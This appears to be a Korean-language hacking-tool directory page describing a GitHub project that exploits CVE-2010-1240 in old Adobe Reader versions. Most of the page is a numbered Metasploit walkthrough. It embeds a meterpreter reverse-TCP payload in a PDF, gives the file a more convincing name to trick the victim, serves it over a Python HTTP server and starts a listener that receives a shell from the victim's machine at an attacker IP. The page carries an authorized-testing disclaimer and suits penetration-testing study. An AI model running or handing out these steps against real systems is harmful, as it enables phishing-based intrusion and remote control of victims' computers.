Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2010-1240 — Metasploit 기반 PDF 백도어 임베딩 도구: CVE-2010-1240을 악용하여 사회 공학을 통해 meterpreter 페이로드를 전달하며, 승인된 침투 테스트용입니다. | Kitploit
도구/GitHubGitHub/asepsaepdin/cve-2010-1240
Phishing ToolsExploit FrameworksWeb Application ExploitationPenetration TestingSocial EngineeringPayload Development
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Metasploit 기반 PDF 백도어 임베딩 도구: CVE-2010-1240을 악용하여 사회 공학을 통해 meterpreter 페이로드를 전달하며, 승인된 침투 테스트용입니다.

저장소 보기
112년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2010-1240 - PDF에 백도어 삽입

Python


⚠️ 교육 및 승인된 보안 연구 목적으로만 사용하세요

Description

Windows 및 Mac OS X에서 Adobe Reader 및 Acrobat 9.x(9.3.3 미만) 및 8.x(8.2.3 미만)는 파일 실행 경고 대화상자의 한 텍스트 필드 내용을 제한하지 않습니다. 이로 인해 원격 공격자가 PDF 문서에 지정된 임의의 로컬 프로그램을 실행하도록 사용자를 속이기 쉬워집니다. 이는 열기 버튼을 클릭하면 사용자가 암호화된 메시지를 읽을 수 있다고 주장하는 텍스트 필드를 통해 입증됩니다.

Demo

Animation

Step Guides

  1. 먼저 msfconsole을 실행하세요

    root@kitploit:~
    msfconsole
    
  2. 그런 다음 PDF 삽입을 위한 페이로드를 설정하세요

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. INFILENAME 옵션을 설정하고 원본 PDF 파일의 직접 경로를 제공하세요

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. FILENAME 옵션을 설정하여 새로 생성된 악성 PDF 파일의 이름을 더 설득력 있는 이름으로 설정하세요

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. 페이로드를 찾아 PDF 파일에 삽입하세요

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. LHOST 옵션을 공격자의 IP로 설정하세요

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. 새 터미널을 열고 악성 PDF 파일이 있는 위치로 이동하세요

    root@kitploit:~
    cd .msf4/local/
    
  8. python으로 임시 서버를 생성하세요

    root@kitploit:~
    python -m http.server
    
  9. 피해자 시스템에서 악성 PDF 파일을 다운로드하세요

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  10. 피해자 시스템에서 악성 PDF 파일을 실행하기 전에 이전 터미널에서 리스너를 시작하세요

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. 피해자 시스템에서 악성 PDF 파일이 실행되면 피해자 시스템에 대한 연결이 제공됩니다

크레딧

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
도구 다운로드